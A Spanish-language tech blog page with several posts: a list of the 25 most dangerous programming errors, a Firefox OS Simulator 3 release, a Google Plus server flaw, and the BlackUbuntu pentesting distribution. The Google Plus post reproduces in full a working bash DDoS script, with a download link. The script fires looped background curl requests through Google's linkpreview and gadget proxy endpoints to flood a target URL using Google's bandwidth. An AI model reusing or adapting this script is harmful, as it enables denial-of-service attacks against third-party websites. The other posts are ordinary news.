Lista de los 25 errores de programación más peligrosos

Grupo internacional de expertos ha publicado una lista con los 25 errores de programación con mayor potencial de daño. La mayor parte de los agujeros de seguridad en programas informáticos se debe a errores de programación, que podrían ser evitados si los programadores fueran más cautelosos con su trabajo.

Ante tal situación, un grupo internacional de expertos ha elaborado una lista con los 25 peores errores de programación que ocasionan vulnerabilidades. El grupo incluye, entre otros, al ministerio de seguridad interior de EEUU y NSA, la organización japonesa IPA y empresas privadas como Microsoft y Symantec.

La mayoría de los 25 errores de la lista son relativamente desconocidos entre los propios programadores. No forman parte de los estudios de los desarrolladores, y un mínimo de los fabricantes de software no prueban sus productos en busca de errores antes de lanzarlos comercialmente.

Las consecuencias pueden ser nefastas. Por ejemplo, dos de tales errores fueron explotados en 2008 para instalar código maligno en 1,5 millones de sitios web, que luego propagaron malware entre sus visitantes.
Continuar leyendo «Lista de los 25 errores de programación más peligrosos»

Descarga Firefox OS Simulator 3

Desde la Fundación Mozilla han anunciado que finalmente ya se encuentra disponible la versión final de Firefox OS Simulator 3.0, una aplicación que nos permite evaluar cómo funciona esta plataforma en PCs y portátiles que utilizan Linux, Windows o Mac OS.

FirefoxOS.2-520x245
En esta nueva versión se incluyen algunas funcionalidades extra como el soporte para la rotación y la geolocalización.

Entre las novedades de Firefox OS Simulator 3.0 destacan la posibilidad de enviar a un teléfono físico la aplicación que estemos desarrollando mediante conexión USB, con la opción “Push to Device”. También incorpora versiones actualizadas del motor de renderizado y las bibliotecas de la interfaz usuario Gaia (la nueva interfaz de Firefox OS) así como atajos para volver a instalar o reiniciar aplicaciones.

El tamaño del simulador es ahora más pequeño, por lo que, tanto descarga como inicio de la aplicación es más rápido.

Por último, cabe mencionar que la documentación de instalación también mejora significativamente.

Para instalar Firefox OS Simulator 3.0 deberemos agregar un complemento al navegador web Firefox, siendo éste un requisito para poder utilizar el simulador. Luego, será cuestión de lanzar el simulador junto con todas las herramientas para desarrolladores que la Fundación Mozilla está ofreciendo actualmente para facilitar el trabajo de los programadores.

Descargar Firefox OS Simulator 3

Fallo de seguridad en los servidores de Google Plus

Google Plus

Google Plus

Un nuevo agujero de seguridad ha sido descubierto en los servidores de Google plus que permite a los hackers hacer un ataque DDoS usando el ancho de banda de Google.

Google plus ha sido objeto de pruebas desde ya hace un tiempo y una de las personas encargadas de estas pruebas (de una empresa de seguridad italiana) ha informado de que los servidores de Google plus se pueden utilizar para hacer solicitudes DDos a otros sitios web.

La noticia original de este informe se puede ver en IHTeam un blog de seguridad propiedad de Simone Quatrini. Él demuestra cómo los usuarios pueden hacer uso del servidor de Google para actuar como un proxy y buscar el contenido de cualquier sitio web que desee. También se observa que los servidores de Google son más anónimos que los demás servidores.

Ha mencionado dos métodos, uno que utiliza / _ / sharebox / linkpreview /. Este método no expone su dirección IP para conectarse a los servidores Apache. Pero el otro método, gadgets / proxy? Parece que si que se expone la dirección IP a los servidores.

El equipo también ha publicado un script para shell de linux que permite ejecutar la vulnerabilidad. El script hace una solicitud a los servidores de Google para hacer una petición a una página web. Lo importante del tema es que se utiliza el ancho de banda de Google en lugar del atancante.

Según comenta el autor, hayo otros métodos para atacar de manera más segura, pero lógicamente no los quiere exponer en la red.

Resumiendo, se puede hacer y descargar senzilla y rápidamente cualquier tipo de archivo a través de los servidores de Google haciendo un DDoS.

Mas abajo teneis el video explicativo y el script en bash que usa en el video Simone Quatrini 😀

Fuente | IHTeam

In this example i start a thread of 1000 requests and the output bandwidth will result in 91/96Mbps (my house bandwidth is only 6Mbps). This is my server, do not start to ddos around for no reason!

+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

#!/bin/bash

#   Bug found by                        #
#       Simone 'R00T_ATI' Quatrini      #
#       Mauro 'epicfail' Gasperini      #
#       Site: http://www.ihteam.net     #

function start {
    echo "[*] Sending `echo $2` Requests..."

    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear

BlackUbuntu – La nueva distribución «para pruebas de seguridad» basada en Ubuntu

Blackbuntu es la distribución de pruebas de penetración, que fue diseñado especialmente para estudiantes de formación en seguridad y profesionales de seguridad de la información. Blackbuntu distro Ubuntu es la base de pruebas de penetración de seguridad con entorno de escritorio GNOME. Es en la actualidad se está construyendo con el Ubuntu 10.10 y de trabajo en la referencia posterior.

Blackubuntu

Blackbuntu features the following upstream components:

Ubuntu 10.10, Linux 2.6.35 and Gnome 2.32.0 System requirements

* 1GHz x86 processor

*768 MB of system memory (RAM)

* 10 GB of disk space for installation

* Graphics card capable of 800×600 resolution

* DVD-ROM drive or USB port

Blackubuntu

BlackUbuntu os la podeis descargar desde el siguiente link
http://sourceforge.net/projects/blackbuntu/files/Community%20Edition/Community%20Edition%200.2/bbuntu-ce-0.2.iso/download

Una breve video review de BlackUbuntu